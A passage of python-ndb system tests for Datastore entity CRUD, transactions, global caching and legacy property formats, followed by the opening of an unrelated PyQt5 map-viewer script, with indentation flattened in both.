entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
cache_key = _cache.global_cache_key(key._key)
cache_key = global_cache_module.MemcacheCache._key(cache_key)
cache_value = memcache_context.global_cache.client.get(cache_key)
assert not cache_value
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
cache_value = memcache_context.global_cache.client.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
entity.foo = 43
entity.put()
cache_value = memcache_context.global_cache.client.get(cache_key)
assert not cache_value
@pytest.mark.usefixtures("client_context")
def test_update_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_insert_entity_in_transaction(dispose_of):
commit_callback = mock.Mock()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def save_entity():
ndb.get_context().call_on_commit(commit_callback)
entity = SomeKind(foo=42, bar="none")
key = entity.put()
dispose_of(key._key)
return key
key = ndb.transaction(save_entity)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == "none"
commit_callback.assert_called_once_with()
@pytest.mark.usefixtures("client_context")
def test_update_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42, bar="none")
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
def update_entity():
key = ndb.Key(KIND, entity_id)
entity = key.get()
entity.foo = 56
entity.bar = "high"
assert entity.put() == key
return key
key = ndb.transaction(update_entity)
retrieved = key.get()
assert retrieved.foo == 56
assert retrieved.bar == "high"
@pytest.mark.usefixtures("client_context")
def test_parallel_transactions():
def task(delay):
@ndb.tasklet
def callback():
transaction = ndb.get_context().transaction
yield ndb.sleep(delay)
assert ndb.get_context().transaction == transaction
raise ndb.Return(transaction)
return callback
future1 = ndb.transaction_async(task(0.1))
future2 = ndb.transaction_async(task(0.06))
ndb.wait_all((future1, future2))
assert future1.get_result() != future2.get_result()
@pytest.mark.usefixtures("client_context")
def test_delete_entity(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_caching(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
client_context.set_cache_policy(None) # Use default
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
assert key.delete() is None
assert key.get() is None
assert key.delete() is None
def test_delete_entity_with_global_cache(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use():
assert key.get().foo == 42
cache_value = global_cache.get([cache_key])[0]
assert cache_value
assert not _cache.is_locked_value(cache_value)
assert key.delete() is None
cache_value = global_cache.get([cache_key])[0]
assert not cache_value
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
cache_value = global_cache.get([cache_key])[0]
assert _cache.is_locked_value(cache_value)
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
def test_delete_entity_with_redis_cache(ds_entity, redis_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
assert key.get().foo == 42
cache_value = redis_context.global_cache.redis.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
assert key.delete() is None
cache_value = redis_context.global_cache.redis.get(cache_key)
assert not cache_value
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
cache_value = redis_context.global_cache.redis.get(cache_key)
assert _cache.is_locked_value(cache_value)
@pytest.mark.skipif(not USE_MEMCACHE, reason="Memcache is not configured")
def test_delete_entity_with_memcache(ds_entity, memcache_context):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
cache_key = _cache.global_cache_key(key._key)
cache_key = global_cache_module.MemcacheCache._key(cache_key)
assert key.get().foo == 42
cache_value = memcache_context.global_cache.client.get(cache_key)
assert cache_value
assert not _cache.is_locked_value(cache_value)
assert key.delete() is None
cache_value = memcache_context.global_cache.client.get(cache_key)
assert not cache_value
# This is py27 behavior. Not entirely sold on leaving _LOCKED value for
# Datastore misses.
assert key.get() is None
cache_value = memcache_context.global_cache.client.get(cache_key)
assert _cache.is_locked_value(cache_value)
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
assert key.get().foo == 42 # not deleted until commit
ndb.transaction(delete_entity)
assert key.get() is None
def test_delete_entity_in_transaction_with_global_cache(client_context, ds_entity):
"""Regression test for #426
https://github.com/googleapis/python-ndb/issues/426
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use():
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
ndb.transaction(key.delete)
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_delete_entity_in_transaction_then_rollback(ds_entity):
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
def delete_entity():
assert key.delete() is None
raise Exception("Spurious error")
with pytest.raises(Exception):
ndb.transaction(delete_entity)
assert key.get().foo == 42
@pytest.mark.usefixtures("client_context")
def test_allocate_ids():
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(5)
assert len(keys) == 5
for key in keys:
assert key.id()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_get_by_id(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, foo=42)
key = ndb.Key(KIND, entity_id)
assert key.get().foo == 42
entity = SomeKind.get_by_id(entity_id)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_get(ds_entity):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
ds_entity(KIND, name, foo=42)
entity = SomeKind.get_or_insert(name, foo=21)
assert entity.foo == 42
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_insert(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
entity = SomeKind.get_or_insert(name, foo=21)
dispose_of(entity._key._key)
assert entity.foo == 21
@pytest.mark.usefixtures("client_context")
def test_get_or_insert_in_transaction(dispose_of):
"""Regression test for #433
https://github.com/googleapis/python-ndb/issues/433
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
name = "Inigo Montoya"
assert SomeKind.get_by_id(name) is None
@ndb.transactional()
def do_the_thing(foo):
entity = SomeKind.get_or_insert(name, foo=foo)
return entity
entity = do_the_thing(42)
dispose_of(entity._key._key)
assert entity.foo == 42
entity = do_the_thing(21)
assert entity.foo == 42
def test_get_by_id_default_namespace_when_context_namespace_is_other(
client_context, dispose_of, other_namespace
):
"""Regression test for #535.
https://github.com/googleapis/python-ndb/issues/535
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
entity1 = SomeKind(foo=1, id="x", namespace="")
entity1.put()
dispose_of(entity1.key._key)
with client_context.new(namespace=other_namespace).use():
result = SomeKind.get_by_id("x", namespace="")
assert result is not None
assert result.foo == 1
def test_get_or_insert_default_namespace_when_context_namespace_is_other(
client_context, dispose_of, other_namespace
):
"""Regression test for #535.
https://github.com/googleapis/python-ndb/issues/535
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
with client_context.new(namespace=other_namespace).use():
SomeKind.get_or_insert("x", namespace="", foo=1)
result = SomeKind.get_by_id("x", namespace="")
assert result is not None
assert result.foo == 1
@pytest.mark.usefixtures("client_context")
def test_insert_entity_with_structured_property(dispose_of):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
def test_insert_entity_with_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
ds_entity = ds_client.get(key._key)
assert ds_entity["foo"] == 42
assert ds_entity["bar.one"] == "hi"
assert ds_entity["bar.two"] == "mom"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity_id = test_utils.system.unique_resource_id()
ds_entity(KIND, entity_id, **{"foo": 42, "bar.one": "hi", "bar.two": "mom"})
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_repeated_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND,
entity_id,
**{"foo": 42, "bar.one": ["hi", "hello"], "bar.two": ["mom", "dad"]}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "hello"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
@pytest.mark.usefixtures("client_context")
def test_legacy_repeated_structured_property_w_expando(
ds_client, dispose_of, client_context
):
"""Regression test for #669
https://github.com/googleapis/python-ndb/issues/669
"""
class OtherKind(ndb.Expando):
one = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity = SomeKind(
foo=42,
bar=[
OtherKind(one="one-a"),
OtherKind(two="two-b"),
OtherKind(one="one-c", two="two-c"),
],
)
with client_context.new(legacy_data=True).use():
key = entity.put()
dispose_of(key._key)
ds_entity = ds_client.get(key._key)
assert ds_entity["bar.one"] == ["one-a", None, "one-c"]
assert ds_entity["bar.two"] == [None, "two-b", "two-c"]
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "one-a"
assert not hasattr(retrieved.bar[0], "two")
assert retrieved.bar[1].one is None
assert retrieved.bar[1].two == "two-b"
assert retrieved.bar[2].one == "one-c"
assert retrieved.bar[2].two == "two-c"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
assert isinstance(retrieved.bar[2], OtherKind)
@pytest.mark.usefixtures("client_context")
def test_legacy_repeated_structured_property_w_expando_empty(
ds_client, dispose_of, client_context
):
"""Regression test for #669
https://github.com/googleapis/python-ndb/issues/669
"""
class OtherKind(ndb.Expando):
one = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity = SomeKind(foo=42, bar=[])
with client_context.new(legacy_data=True).use():
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar == []
@pytest.mark.usefixtures("client_context")
def test_insert_expando(dispose_of):
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
entity = SomeKind(foo=42)
entity.expando_prop = "exp-value"
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.expando_prop == "exp-value"
def test_insert_expando_w_legacy_structured_property(client_context, dispose_of):
"""Regression test for issue #673
https://github.com/googleapis/python-ndb/issues/673
"""
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
class OtherKind(ndb.Expando):
bar = ndb.StringProperty()
with client_context.new(legacy_data=True).use():
entity = SomeKind(
foo=42,
other=OtherKind(
bar="hi mom!",
other=OtherKind(bar="hello dad!"),
),
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.other.bar == "hi mom!"
# Note that the class for the subobject is lost. I tested with legacy NDB and
# this is true there as well.
assert isinstance(retrieved.other, ndb.Expando)
assert not isinstance(retrieved.other, OtherKind)
def test_insert_expando_w_legacy_dynamic_dict(client_context, dispose_of):
"""Regression test for issue #673
https://github.com/googleapis/python-ndb/issues/673
"""
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
with client_context.new(legacy_data=True).use():
dynamic_dict_value = {"k1": {"k2": {"k3": "v1"}}, "k4": "v2"}
entity = SomeKind(foo=42, dynamic_dict_prop=dynamic_dict_value)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.dynamic_dict_prop.k1.k2.k3 == "v1"
assert retrieved.dynamic_dict_prop.k4 == "v2"
@pytest.mark.usefixtures("client_context")
def test_insert_polymodel(dispose_of):
class Animal(ndb.PolyModel):
one = ndb.StringProperty()
class Feline(Animal):
two = ndb.StringProperty()
class Cat(Feline):
three = ndb.StringProperty()
entity = Cat(one="hello", two="dad", three="i'm in jail")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved, Animal)
assert isinstance(retrieved, Cat)
assert retrieved.one == "hello"
assert retrieved.two == "dad"
assert retrieved.three == "i'm in jail"
@pytest.mark.usefixtures("client_context")
def test_insert_autonow_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
entity = SomeKind(foo="bar")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.created_at, datetime.datetime)
assert isinstance(retrieved.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_insert_autonow_property_with_tz(dispose_of):
"""Regression test for #517
https://github.com/googleapis/python-ndb/issues/517
"""
class SomeKind(ndb.Model):
created_at = ndb.DateTimeProperty(auto_now_add=True, tzinfo=pytz.utc)
updated_at = ndb.DateTimeProperty(auto_now=True, tzinfo=pytz.utc)
now = datetime.datetime.now(pytz.utc)
entity = SomeKind()
key = entity.put()
dispose_of(key._key)
_assert_contemporaneous(entity.created_at, now)
_assert_contemporaneous(entity.updated_at, now)
retrieved = key.get()
_assert_contemporaneous(retrieved.created_at, now)
_assert_contemporaneous(retrieved.updated_at, now)
@pytest.mark.usefixtures("client_context")
def test_insert_datetime_property_with_tz(dispose_of):
"""Regression test for #517
https://github.com/googleapis/python-ndb/issues/517
"""
class SomeKind(ndb.Model):
alarm1 = ndb.DateTimeProperty(tzinfo=pytz.utc)
alarm2 = ndb.DateTimeProperty(tzinfo=pytz.utc)
now = datetime.datetime.now(pytz.utc)
entity = SomeKind(
alarm1=now,
alarm2=datetime.datetime.utcnow(), # naive
)
key = entity.put()
dispose_of(key._key)
_assert_contemporaneous(entity.alarm1, now)
_assert_contemporaneous(entity.alarm2, now)
retrieved = key.get()
_assert_contemporaneous(retrieved.alarm1, now)
_assert_contemporaneous(retrieved.alarm2, now)
@pytest.mark.usefixtures("client_context")
def test_insert_nested_autonow_property(dispose_of):
class OtherKind(ndb.Model):
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
class SomeKind(ndb.Model):
other = ndb.StructuredProperty(OtherKind)
entity = SomeKind(other=OtherKind())
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.other.created_at, datetime.datetime)
assert isinstance(retrieved.other.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_uninitialized_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty(required=True)
entity = SomeKind()
with pytest.raises(ndb.exceptions.BadValueError):
entity.put()
@mock.patch(
"google.cloud.ndb._datastore_api.make_call",
mock.Mock(side_effect=Exception("Datastore shouldn't get called.")),
)
def test_crud_without_datastore(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
context.set_datastore_policy(False) # Don't use Datastore
key = ndb.Key(KIND, entity_id)
SomeKind(foo=42, bar="none", baz="night", _key=key).put()
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
key.delete()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_computed_key_property(dispose_of):
"""Regression test for #284.
https://github.com/googleapis/python-ndb/issues/284
"""
class AModel(ndb.Model):
s_foo = ndb.StringProperty()
class BModel(ndb.Model):
s_bar = ndb.StringProperty()
key_a = ndb.KeyProperty(kind="AModel", indexed=True)
class CModel(ndb.Model):
s_foobar = ndb.StringProperty()
key_b = ndb.KeyProperty(kind="BModel", indexed=True)
key_a = ndb.ComputedProperty( # Issue here
lambda self: self.key_b.get().key_a if self.key_b else None,
)
key_a = AModel(s_foo="test").put()
dispose_of(key_a._key)
key_b = BModel(s_bar="test", key_a=key_a).put()
dispose_of(key_b._key)
key_c = CModel(s_foobar="test", key_b=key_b).put()
dispose_of(key_c._key)
entity = key_c.get()
assert entity.key_a == key_a
assert entity.key_b == key_b
@pytest.mark.usefixtures("client_context")
def test_user_property(dispose_of):
class SomeKind(ndb.Model):
user = ndb.UserProperty()
user = ndb.User("somebody@example.com", "gmail.com")
entity = SomeKind(user=user)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.user.email() == "somebody@example.com"
assert retrieved.user.auth_domain() == "gmail.com"
@pytest.mark.usefixtures("client_context")
def test_user_property_different_user_class(dispose_of):
class SomeKind(ndb.Model):
user = ndb.UserProperty()
class User(object):
def email(self):
return "somebody@example.com"
def auth_domain(self):
return "gmail.com"
def user_id(self):
return None
entity = SomeKind(user=User())
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.user.email() == "somebody@example.com"
assert retrieved.user.auth_domain() == "gmail.com"
@pytest.mark.usefixtures("client_context")
def test_repeated_empty_strings(dispose_of):
"""Regression test for issue # 300.
https://github.com/googleapis/python-ndb/issues/300
"""
class SomeKind(ndb.Model):
foo = ndb.StringProperty(repeated=True)
entity = SomeKind(foo=["", ""])
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == ["", ""]
@pytest.mark.skipif(not USE_REDIS_CACHE, reason="Redis is not configured")
@pytest.mark.usefixtures("redis_context")
def test_multi_get_weirdness_with_redis(dispose_of):
"""Regression test for issue #294.
https://github.com/googleapis/python-ndb/issues/294
"""
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
objects = [SomeKind(foo=str(i)) for i in range(10)]
keys = ndb.put_multi(objects)
for key in keys:
dispose_of(key._key)
ndb.get_multi(keys)
one_object = random.choice(keys).get()
one_object.foo = "CHANGED"
one_object.put()
objects_upd = ndb.get_multi(keys)
keys_upd = [obj.key for obj in objects_upd]
assert len(keys_upd) == len(keys)
assert len(set(keys_upd)) == len(set(keys))
assert set(keys_upd) == set(keys)
@pytest.mark.usefixtures("client_context")
def test_multi_with_lots_of_keys(dispose_of):
"""Regression test for issue #318.
https://github.com/googleapis/python-ndb/issues/318
"""
N = 1001
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
foos = list(range(N))
entities = [SomeKind(foo=foo) for foo in foos]
keys = ndb.put_multi(entities)
dispose_of(*(key._key for key in keys))
assert len(keys) == N
entities = ndb.get_multi(keys)
assert [entity.foo for entity in entities] == foos
ndb.delete_multi(keys)
entities = ndb.get_multi(keys)
assert entities == [None] * N
@pytest.mark.usefixtures("client_context")
def test_allocate_a_lot_of_keys():
N = 1001
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(N)
assert len(keys) == N
@pytest.mark.usefixtures("client_context")
def test_delete_multi_with_transactional(dispose_of):
"""Regression test for issue #271
https://github.com/googleapis/python-ndb/issues/271
"""
N = 10
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
@ndb.transactional()
def delete_them(entities):
ndb.delete_multi([entity.key for entity in entities])
foos = list(range(N))
entities = [SomeKind(foo=foo) for foo in foos]
keys = ndb.put_multi(entities)
dispose_of(*(key._key for key in keys))
entities = ndb.get_multi(keys)
assert [entity.foo for entity in entities] == foos
assert delete_them(entities) is None
entities = ndb.get_multi(keys)
assert entities == [None] * N
@pytest.mark.usefixtures("client_context")
def test_compressed_text_property(dispose_of, ds_client):
"""Regression test for #277
https://github.com/googleapis/python-ndb/issues/277
"""
class SomeKind(ndb.Model):
foo = ndb.TextProperty(compressed=True)
entity = SomeKind(foo="Compress this!")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "Compress this!"
ds_entity = ds_client.get(key._key)
assert zlib.decompress(ds_entity["foo"]) == b"Compress this!"
def test_insert_entity_with_repeated_local_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
"""Regression test for #326
https://github.com/googleapis/python-ndb/issues/326
"""
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.LocalStructuredProperty(OtherKind, repeated=True)
with client_context.new(legacy_data=True).use():
entity = SomeKind(
foo=42,
bar=[
OtherKind(one="hi", two="mom"),
OtherKind(one="and", two="dad"),
],
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "and"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
def test_insert_structured_property_with_unindexed_subproperty_legacy_data(
client_context, dispose_of, ds_client
):
"""Regression test for #341
https://github.com/googleapis/python-ndb/issues/341
"""
class OtherKind(ndb.Model):
data = ndb.BlobProperty(indexed=False)
class SomeKind(ndb.Model):
entry = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(entry=OtherKind(data=b"01234567890" * 1000))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.entry, OtherKind)
@pytest.mark.usefixtures("client_context")
def test_serialization(dispose_of):
"""Regression test for #384
https://github.com/googleapis/python-ndb/issues/384
"""
# This is needed because pickle can't serialize local objects
global SomeKind, OtherKind
class OtherKind(ndb.Model):
foo = ndb.IntegerProperty()
@classmethod
def _get_kind(cls):
return "OtherKind"
class SomeKind(ndb.Model):
other = ndb.StructuredProperty(OtherKind)
@classmethod
def _get_kind(cls):
return "SomeKind"
entity = SomeKind(other=OtherKind(foo=1, namespace="Test"), namespace="Test")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.other.key is None or retrieved.other.key.id() is None
entity = pickle.loads(pickle.dumps(retrieved))
assert entity.other.foo == 1
@pytest.mark.usefixtures("client_context")
def test_custom_validator(dispose_of, ds_client):
"""New feature test for #252
https://github.com/googleapis/python-ndb/issues/252
"""
def date_validator(prop, value):
return datetime.datetime.strptime(value, "%Y-%m-%d %H:%M:%S")
class SomeKind(ndb.Model):
foo = ndb.DateTimeProperty(validator=date_validator)
entity = SomeKind(foo="2020-08-08 1:02:03")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == datetime.datetime(2020, 8, 8, 1, 2, 3)
def test_cache_returns_entity_if_available(dispose_of, client_context):
"""Regression test for #441
https://github.com/googleapis/python-ndb/issues/441
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
client_context.set_cache_policy(None) # Use default
somekind = SomeKind(foo=1)
key = somekind.put()
dispose_of(key._key)
query = ndb.Query(kind="SomeKind")
ourkind = query.get()
ourkind.bar = "confusing"
assert somekind.bar == "confusing"
def test_cache_off_new_entity_created(dispose_of, client_context):
"""Regression test for #441
https://github.com/googleapis/python-ndb/issues/441
"""
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
somekind = SomeKind(foo=1)
key = somekind.put()
dispose_of(key._key)
query = ndb.Query(kind="SomeKind")
ourkind = query.get()
ourkind.bar = "confusing"
assert somekind.bar is None
@pytest.mark.usefixtures("client_context")
def test_local_structured_property_with_polymodel(dispose_of):
"""Regression test for #481
https://github.com/googleapis/python-ndb/issues/481
"""
class Base(ndb.PolyModel):
pass
class SubKind(Base):
foo = ndb.StringProperty()
class Container(ndb.Model):
child = ndb.LocalStructuredProperty(Base)
entity = Container(child=SubKind(foo="bar"))
key = entity.put()
dispose_of(key._key)
entity = entity.key.get()
assert entity.child.foo == "bar"
@pytest.mark.usefixtures("client_context")
def test_local_structured_property_with_inheritance(dispose_of):
"""Regression test for #523
https://github.com/googleapis/python-ndb/issues/523
"""
class Base(ndb.Model):
pass
class SubKind(Base):
foo = ndb.StringProperty()
class Container(ndb.Model):
children = ndb.LocalStructuredProperty(Base, repeated=True)
entity = Container()
subkind = SubKind(foo="bar")
entity.children.append(subkind)
key = entity.put()
dispose_of(key._key)
entity = entity.key.get()
assert isinstance(entity.children[0], Base)
def test_structured_property_with_nested_compressed_json_property_using_legacy_format(
client_context, dispose_of
):
"""Regression test for #602
https://github.com/googleapis/python-ndb/issues/602
"""
class OtherKind(ndb.Model):
data = ndb.JsonProperty(compressed=True)
class SomeKind(ndb.Model):
sub_model = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
model = SomeKind(sub_model=OtherKind(data={"test": 1}))
key = model.put()
dispose_of(key._key)
assert key.get().sub_model.data["test"] == 1
|
read_map.py | #!/usr/bin/env python3
import os
import sys
from threading import Thread
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d as plt3d
import msgpack
import numpy as np
import open3d as o3d
import pptk
import scipy.spatial.transform as sst
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import QObject, QUrl, pyqtSignal, pyqtProperty
from PyQt5.QtQuick import QQuickView
from PyQt5.QtWidgets import QWidget
QtCore.Signal = QtCore.pyqtSignal
def _change_frame(a):
""" (x, y, z) <- (x, z, -y) """
return np.concatenate((a[:, [0]], a[:, [2]], np.negative(a[:, [1]])), axis=1)
class MapInfo(QObject):
loadingChanged = pyqtSignal()
filenameChanged = pyqtSignal()
keypointCountChanged = pyqtSignal()
keyframeCountChanged = pyqtSignal()
visualiseTrajectory = pyqtSignal()
visualiseCloud = pyqtSignal()
exportCloud = pyqtSignal('QString')
def __init__(self, parent=None):
QObject.__init__(self, parent)
self._loading = False
self._filename = None
self._keypoint_count = 0
self._keyframe_count = 0
@pyqtProperty('bool', notify=loadingChanged)
def loading(self):
return self._loading
@loading.setter
def loading(self, status):
self._loading = status
self.loadingChanged.emit()
@pyqtProperty('int', notify=keyframeCountChanged)
def keyframeCount(self):
return self._keyframe_count
@keyframeCount.setter
def keyframeCount(self, n):
self._keyframe_count = n
self.keyframeCountChanged.emit()
@pyqtProperty('int', notify=keypointCountChanged)
def keypointCount(self):
return self._keypoint_count
@keypointCount.setter
def keypointCount(self, n):
self._keypoint_count = n
self.keypointCountChanged.emit()
@pyqtProperty('QString', notify=filenameChanged)
def filename(self):
return self._filename
@filename.setter
def filename(self, filename):
self._filename = filename.replace('file://', '')
self.filenameChanged.emit()
class MainWindow(QtWidgets.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
